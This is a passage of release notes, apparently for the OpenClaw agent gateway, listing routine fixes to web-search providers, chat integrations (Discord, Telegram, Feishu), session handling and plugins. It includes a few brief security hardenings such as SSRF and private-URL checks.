<p>Web search/Kimi: fail explicitly when Moonshot returns an ungrounded chat answer instead of native web-search evidence, so Kimi no longer reports generic fallback text as a successful search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>.</p>
</li>
<li>
<p>Web search: keep public provider requests on the strict SSRF guard and reserve private-network access for explicit self-hosted SearXNG/Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>.</p>
</li>
<li>
<p>Firecrawl: reject private, loopback, metadata, and non-HTTP(S) <code>firecrawl_scrape</code> target URLs before forwarding them to Firecrawl. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>.</p>
</li>
<li>
<p>Web search/Firecrawl: allow self-hosted private/internal Firecrawl <code>baseUrl</code> endpoints, including HTTP for private targets, while keeping hosted Firecrawl on the strict official endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</p>
</li>
<li>
<p>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</p>
</li>
<li>
<p>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</p>
</li>
<li>
<p>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</p>
</li>
<li>
<p>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Web search/Exa: accept <code>plugins.entries.exa.config.webSearch.baseUrl</code>, normalize it to the Exa <code>/search</code> endpoint, and partition cached results by endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>.</p>
</li>
<li>
<p>Web search/MiniMax: include MiniMax Search in the web-search setup flow and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</p>
</li>
<li>
<p>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</p>
</li>
<li>
<p>Web search/MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials, so OAuth-authorized MiniMax Token Plan setups do not need a separate web-search key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</p>
</li>
<li>
<p>Providers/MiniMax: derive Coding Plan usage polling from the configured MiniMax base URL, so global setups no longer query the CN usage host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</p>
</li>
<li>
<p>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</p>
</li>
<li>
<p>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</p>
</li>
<li>
<p>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</p>
</li>
<li>
<p>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</p>
</li>
<li>
<p>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</p>
</li>
<li>
<p>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</p>
</li>
<li>
<p>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</p>
</li>
<li>
<p>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</p>
</li>
<li>
<p>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</p>
</li>
<li>
<p>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</p>
</li>
<li>
<p>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</p>
</li>
<li>
<p>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</p>
</li>
<li>
<p>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
<p>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
